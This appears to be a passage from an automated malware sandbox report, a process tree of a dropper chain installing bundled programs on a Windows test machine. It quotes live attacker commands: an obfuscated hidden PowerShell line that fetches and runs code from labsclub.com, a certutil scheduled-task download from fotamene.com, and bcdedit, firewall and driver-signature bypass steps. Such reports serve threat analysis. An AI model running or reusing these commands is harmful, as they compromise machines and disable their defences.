- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1232

C:\Users\Admin\AppData\Local\Temp\is-I0HDH.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-I0HDH.tmp\winlthst.exe" test1 test1
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4540

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\gAWOBgAOx.dll"
11⤵
PID:5000

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\gAWOBgAOx.dll"
12⤵
- Loads dropped DLL
PID:4168

C:\Windows\system32\regsvr32.exe
/s "C:\Users\Admin\AppData\Local\Temp\gAWOBgAOx.dll"
13⤵
PID:4720

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\gAWOBgAOx.dllwbDBSCGEy.dll"
11⤵
PID:4412

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\gAWOBgAOx.dllwbDBSCGEy.dll"
12⤵
PID:6600

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:6452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\dscovpkjwbb\vict.exe
"C:\Users\Admin\AppData\Local\Temp\dscovpkjwbb\vict.exe" /VERYSILENT /id=535
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4000

C:\Users\Admin\AppData\Local\Temp\is-9BTIT.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9BTIT.tmp\vict.tmp" /SL5="$60058,870426,780800,C:\Users\Admin\AppData\Local\Temp\dscovpkjwbb\vict.exe" /VERYSILENT /id=535
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2936

C:\Users\Admin\AppData\Local\Temp\is-MTLDK.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-MTLDK.tmp\wimapi.exe" 535
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4640

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\B728hZqcr.dll"
11⤵
PID:2400

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\B728hZqcr.dll"
12⤵
- Loads dropped DLL
PID:2216

C:\Windows\system32\regsvr32.exe
/s "C:\Users\Admin\AppData\Local\Temp\B728hZqcr.dll"
13⤵
- Loads dropped DLL
PID:4504

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\B728hZqcr.dll8iEiW0RdO.dll"
11⤵
PID:6252

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\B728hZqcr.dll8iEiW0RdO.dll"
12⤵
PID:6672

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:2984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
- Blocklisted process makes network request
PID:420

C:\Users\Admin\AppData\Local\Temp\pd0l3i45zhi\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\pd0l3i45zhi\vpn.exe" /silent /subid=482
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4036

C:\Users\Admin\AppData\Local\Temp\is-MDIPB.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MDIPB.tmp\vpn.tmp" /SL5="$50154,15170975,270336,C:\Users\Admin\AppData\Local\Temp\pd0l3i45zhi\vpn.exe" /silent /subid=482
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:4584

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:4248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:5004

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:6636

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7092

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5900

C:\Users\Admin\AppData\Local\Temp\m4i0l4eeepv\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\m4i0l4eeepv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4268

C:\Users\Admin\AppData\Local\Temp\is-DQVAK.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DQVAK.tmp\IBInstaller_97039.tmp" /SL5="$10344,14456800,721408,C:\Users\Admin\AppData\Local\Temp\m4i0l4eeepv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4440

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://janisjackets.us/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
- Checks computer location settings
PID:4716

C:\Users\Admin\AppData\Local\Temp\is-R2IN0.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-R2IN0.tmp\{app}\chrome_proxy.exe"
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-R2IN0.tmp\{app}\chrome_proxy.exe"
11⤵
PID:6680

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
12⤵
- Runs ping.exe
PID:5440

C:\Users\Admin\AppData\Local\Temp\xkw155lrmu4\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\xkw155lrmu4\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:860

C:\Users\Admin\AppData\Local\Temp\2t2lovp3hws\app.exe
"C:\Users\Admin\AppData\Local\Temp\2t2lovp3hws\app.exe" /8-23
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4568

C:\Program Files (x86)\Wild-Dew\7za.exe
"C:\Program Files (x86)\Wild-Dew\7za.exe" e -p154.61.71.51 winamp-plugins.7z
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5624

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Wild-Dew\app.exe" -map "C:\Program Files (x86)\Wild-Dew\WinmonProcessMonitor.sys""
9⤵
PID:5700

C:\Program Files (x86)\Wild-Dew\app.exe
"C:\Program Files (x86)\Wild-Dew\app.exe" -map "C:\Program Files (x86)\Wild-Dew\WinmonProcessMonitor.sys"
10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5892

C:\Program Files (x86)\Wild-Dew\7za.exe
"C:\Program Files (x86)\Wild-Dew\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5372

C:\Program Files (x86)\Wild-Dew\app.exe
"C:\Program Files (x86)\Wild-Dew\app.exe" /8-23
9⤵
- Executes dropped EXE
PID:6480

C:\Program Files (x86)\Wild-Dew\app.exe
"C:\Program Files (x86)\Wild-Dew\app.exe" /8-23
10⤵
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
PID:5944

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
11⤵
PID:4400

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
12⤵
PID:2528

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /8-23
11⤵
- Drops file in Drivers directory
- Modifies data under HKEY_USERS
PID:3512

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
12⤵
- Creates scheduled task(s)
PID:6416

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
12⤵
- Creates scheduled task(s)
PID:3652

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
12⤵
- Loads dropped DLL
PID:6584

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
13⤵
- Modifies boot configuration data using bcdedit
PID:6912

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:2032

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:3460

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
13⤵
- Modifies boot configuration data using bcdedit
PID:6920

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:6328

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:4076

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
13⤵
- Modifies boot configuration data using bcdedit
PID:5592

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
13⤵
- Modifies boot configuration data using bcdedit
PID:5812

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
13⤵
- Modifies boot configuration data using bcdedit
PID:4932

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
13⤵
- Modifies boot configuration data using bcdedit
PID:4832

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
13⤵
- Modifies boot configuration data using bcdedit
PID:5340

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
13⤵
- Modifies boot configuration data using bcdedit
PID:6284

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
13⤵
- Modifies boot configuration data using bcdedit
PID:6924

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
13⤵
- Modifies boot configuration data using bcdedit
PID:4964

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
12⤵
- Modifies boot configuration data using bcdedit
PID:6916

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
12⤵
- Drops file in Drivers directory
PID:5408

C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
12⤵
- Modifies data under HKEY_USERS
PID:6984

C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
12⤵
PID:5320

C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"
13⤵
PID:3460

C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
12⤵
PID:6280

C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"
13⤵
PID:4652

C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
12⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"
13⤵
PID:7804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=f1334a39-a888-4661-b71d-dafb447e49c2&browser=chrome
14⤵
PID:7924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7fff6df16e00,0x7fff6df16e10,0x7fff6df16e20
15⤵
PID:7932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1884 /prefetch:8
15⤵
PID:8168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1872 /prefetch:8
15⤵
PID:8156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:2
15⤵
PID:8148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:1
15⤵
PID:4044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:1
15⤵
PID:4876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
15⤵
PID:7860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
15⤵
PID:8184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
15⤵
PID:7988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
15⤵
PID:6152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4468 /prefetch:8
15⤵
PID:8756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 /prefetch:8
15⤵
PID:3488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:8
15⤵
PID:9104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4708 /prefetch:8
15⤵
PID:9868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:8
15⤵
PID:9904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5172 /prefetch:8
15⤵
PID:9940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5176 /prefetch:8
15⤵
PID:9980

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
15⤵
PID:10036

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff61abd7740,0x7ff61abd7750,0x7ff61abd7760
16⤵
PID:10052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5996 /prefetch:8
15⤵
PID:9256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
15⤵
PID:9272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4168 /prefetch:8
15⤵
PID:9332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3864 /prefetch:8
15⤵
PID:9368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3860 /prefetch:8
15⤵
PID:9408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3956 /prefetch:8
15⤵
PID:9448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4372 /prefetch:8
15⤵
PID:9484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5704 /prefetch:8
15⤵
PID:9520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5696 /prefetch:8
15⤵
PID:9560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5512 /prefetch:8
15⤵
PID:9616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5524 /prefetch:8
15⤵
PID:9652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6236 /prefetch:8
15⤵
PID:9692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6376 /prefetch:8
15⤵
PID:9716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:8
15⤵
PID:9768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:8
15⤵
PID:9804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6748 /prefetch:8
15⤵
PID:3140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,11235744228527955939,4581604599443034037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5496 /prefetch:8
15⤵
PID:5692

C:\Program Files\Google\Chrome\Application\chrome.exe
